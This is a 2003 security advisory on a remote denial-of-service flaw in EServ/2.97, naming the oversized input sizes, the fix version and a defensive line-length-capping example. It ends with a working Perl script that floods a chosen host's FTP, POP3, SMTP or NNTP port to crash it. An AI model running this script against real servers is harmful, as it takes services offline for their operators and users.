EServ/2.97 remote DoS

2003-01-05T00:00:00
ID SECURITYVULNS:DOC:3938
Type securityvulns
Reporter Securityvulns
Modified 2003-01-05T00:00:00

Description

###############################################*

Damage Hacking Group security advisory

www.dhgroup.org

###############################################*

Product: EServ/2.97

Authors: Etype Co. [www.eserv.ru]

Vulnerable versions: up to v.2.97, possibly 2.98

Not vulnerable versions: v.2.99

Vulnerability: remote DoS

###############################################*

Overview#--------------------------------------------------------------

From EServ's 'readme' file: "Eserv/2.97 - mail, news, web, ftp and proxy server. It includes:

  • SMTP, POP3, NNTP -servers
  • caching HTTP/FTP proxy
  • HTTP server (maintaining virtual servers)
  • FTP server (with download and upload resuming support)
  • FTP-gate
  • Socks5, Socks4 and 4a proxy
  • TCP and UDP mapping proxy
  • Finger-server"

Problem#---------------------------------------------------------------

We found 4 bugs that allow killing EServ by sending data of a very large size: FTP - 5005312b, POP3 - 4950001b, SMTP - 4960000b, NNTP - 5001216b. This is not a buffer overflow, so it's impossible to use these bugs for privilege escalation or anything like that.

Fix#--------------------------------------------------------------------

Download the new version from www.eserv.ru. EServ/2.99 is not vulnerable.
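For anyone maintaining a similar line-oriented service (FTP, POP3, SMTP, NNTP), the following is an added example, not part of the advisory and not EServ code, of a line reader that caps how much unterminated input it will buffer. The advisory does not state the root cause, so the example assumes the failure comes from accumulating an oversized line; `MAX_LINE`, `RECV_SIZE` and all names are assumptions chosen for the example.

```python
MAX_LINE = 512     # assumed per-line cap for this example; choose per protocol
RECV_SIZE = 4096   # assumed size of each socket read

class BoundedLineReader:
    """Splits a byte stream into lines without ever buffering more than
    max_line bytes of unterminated input plus one recv() chunk."""

    def __init__(self, max_line=MAX_LINE):
        self.max_line = max_line
        self.buf = bytearray()
        self.overflow = False   # set once the peer exceeds the cap
        self.peak = 0           # largest buffer size seen (for the demo)

    def feed(self, chunk):
        """Add one recv() result; return the complete lines it finished."""
        self.buf += chunk
        self.peak = max(self.peak, len(self.buf))
        lines = []
        while not self.overflow:
            nl = self.buf.find(b"\n")
            end = nl if nl != -1 else len(self.buf)
            if end > self.max_line:      # line (or partial line) too long
                self.overflow = True
                self.buf.clear()         # release the memory immediately
            elif nl == -1:               # short partial line: wait for more
                break
            else:
                lines.append(bytes(self.buf[:nl]).rstrip(b"\r"))
                del self.buf[:nl + 1]
        return lines

def handle_session(chunks, max_line=MAX_LINE):
    """Drive the reader over recv() results.
    Returns (lines, dropped, bytes_read, peak_buffer)."""
    reader = BoundedLineReader(max_line)
    lines, bytes_read = [], 0
    for chunk in chunks:
        bytes_read += len(chunk)
        lines += reader.feed(chunk)
        if reader.overflow:
            break   # a real server would send an error reply and close here
    return lines, reader.overflow, bytes_read, reader.peak

def chunked(data, size=RECV_SIZE):
    """Yield data lazily in recv()-sized pieces, as a socket would deliver it."""
    for i in range(0, len(data), size):
        yield data[i:i + size]

if __name__ == "__main__":
    # Constructed input: the POP3 size from the advisory, with no line break.
    print(handle_session(chunked(b"a" * 4950001 + b"\n")))
```

With the cap in place the session is dropped after the first read, so the remaining megabytes are never received or buffered.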

Exploit#----------------------------------------------------------------

#!/usr/bin/perl
# EServ/2.97 remote DoS xsploit
# Bugs found in v.2.97 but I think that 2.98 is
# vulnerable too.
# Usage: perl EServ.DoS.pl [host] [port] [service_type]
# Where 'service_type' - service to attack (pop, smtp, ftp, nntp)
# Example: perl EServ.DoS.pl localhost 110 pop
# If something wrong or u wanna to discuss something,
# contact me: "D4rkGr3y" <grey_1999@mail.ru> icq: 540981

use IO::Socket;

$host = $ARGV[0];
$port = $ARGV[1];
$param = $ARGV[2];
$data = "a";

print "\n\n";
print "#Product: EServ/2.97 - www.eserv.ru\n";
print "#Vuln: remote DoS\n";
print "#Xsploit by D4rkGr3y\n";
print "#Warning: if u use dial-up connection, attack can take a few time.\n\n";

if ($param) {
    $num = "4950001" if $param eq "pop";
    $num = "4960000" if $param eq "smtp";
    $num = "5005312" if $param eq "ftp";
    $num = "5001215" if $param eq "nntp";
    die "Error in params\n" if !$num;
    print "Connecting...";
    $socket = IO::Socket::INET->new(PeerAddr => $host,
                                    PeerPort => $port,
                                    Proto => "tcp",
                                    Type => SOCK_STREAM) or die "Socket error.\n";
    print "OK\n";
    $buf .= $data x $num;
    print "Attacking...";
    print $socket "$buf\n";
    print "OK\n\n";
    print "Vizit us at www.dhgroup.org";
    close($socket);
} else {
    print "Error in Params.\n";
    print "Usage: perl EServ.DoS.pl [host] [port] [service_type]\n";
    print "Where 'service_type' - service to attack (pop, smtp, ftp, nntp)\n";
    print "Example: perl EServ.DoS.pl 127.0.0.1 110 pop\n";
    exit;
}

#EOF

Best regards www.dhgroup.org D4rkGr3y icq 540981